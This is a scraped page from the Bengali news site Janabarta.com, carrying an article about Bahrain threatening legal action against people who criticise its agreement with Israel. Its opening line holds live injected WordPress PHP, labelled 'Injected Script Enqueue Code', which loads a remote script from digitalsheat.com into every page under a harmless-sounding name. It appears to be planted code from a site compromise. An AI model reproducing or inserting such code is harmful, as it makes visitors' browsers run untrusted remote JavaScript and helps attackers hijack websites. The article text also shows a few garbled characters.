// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site ইসরাইলের সঙ্গে চুক্তির বিরোধিতা করলেই আইনি ব্যবস্থাঃ বাহরাইন - Janabarta.com

ইসরাইলের সঙ্গে চুক্তির বিরোধিতা করলেই আইনি ব্যবস্থাঃ বাহরাইন

আন্তর্জাতিক ডেস্কঃ ইসরাইলের সঙ্গে চুক্তি নিয়ে বিরুদ্ধাচরণ করলে আইনি ব্যবস্থা নেয়ার ঘোষণা দিয়েছে বাহরাইন। সম্প্রতি স্বাক্ষরিত ঐতিহাসিক ওই চুক্তি নিয়ে অখুশি দেশটির জনগণের একাংশ। তাদের মধ্যে কেউ কেউ আবার সামাজিক যোগাযোগ মাধ্যমেও এ চুক্তির বিরুদ্ধে সক্রিয় রয়েছে। তবে এবার বাহরাইনের স্বরাষ্ট্র মন্ত্রণালয় সরাসরি জানিয়ে দিয়েছে, এ চুক্তি নিয়ে ভবিষ্যতে কোনো সমালোচনা করা হলে এসব কথিত এক্টিভিস্টদের বিরুদ্ধে আইনি ব্যবস্থা নেয়া হবে। এ খবর দিয়েছে মিডল ইস্ট মনিটর।

খবরে জানানো হয়েছে, এ নিয়ে একটি বিবৃতি দিয়েছে বাহরাইনের স্বরাষ্ট্র মন্ত্রণালয়। বিবৃতিতে বলা হয়েছে, ইসরাইলের সঙ্গে চুক্তির মাধ্যমে বাহরাইন যে সুনাম অর্জন করেছে তা ক্ষুণè করতে সামাজিক যোগাযোগ মাধ্যমে কিছু একাউন্ট সক্রিয় হয়ে উঠেছে। এগুলো নজরদারির মধ্যে নিয়ে আসা হয়েছে।

তারা যা করছে তা রাষ্ট্রদ্রোহ এবং বাহরাইনের স্থিতিশীলতার জন্য হুমকি। আরবদের মধ্যে গত শতাব্দীতেও ব্যাপক ‘ইহুদিবিদ্বেষ’ লক্ষ্য করা যেত। এখনো তৃতীয় বিশ্বের মুসলিম দেশগুলোতে ইসরাইলের তীব্র বিরোধিতা দেখা যায়। তবে আরব দেশগুলোর মিডিয়ায় ইসরাইল বিরোধিতা দেখা যায়না। মধ্যপ্রাচ্যে সৌদি আরবের মিত্র ইসলামিক রাষ্ট্রগুলোও ঝুঁকছে ইসরাইলের দিকে। আনুষ্ঠানিকভাবে স¤পর্ক স্থাপন করেছে সংযুক্ত আরব আমিরাত ও বাহরাইন। সৌদি আরবসহ আরো অন্তত ৯টি দেশ ইসরাইলের সঙ্গে স¤পর্ক স্থাপনে আগ্রহী বলে জানিয়েছেন মার্কিন প্রেসিডেন্ট ডনাল্ড ট্রা¤প।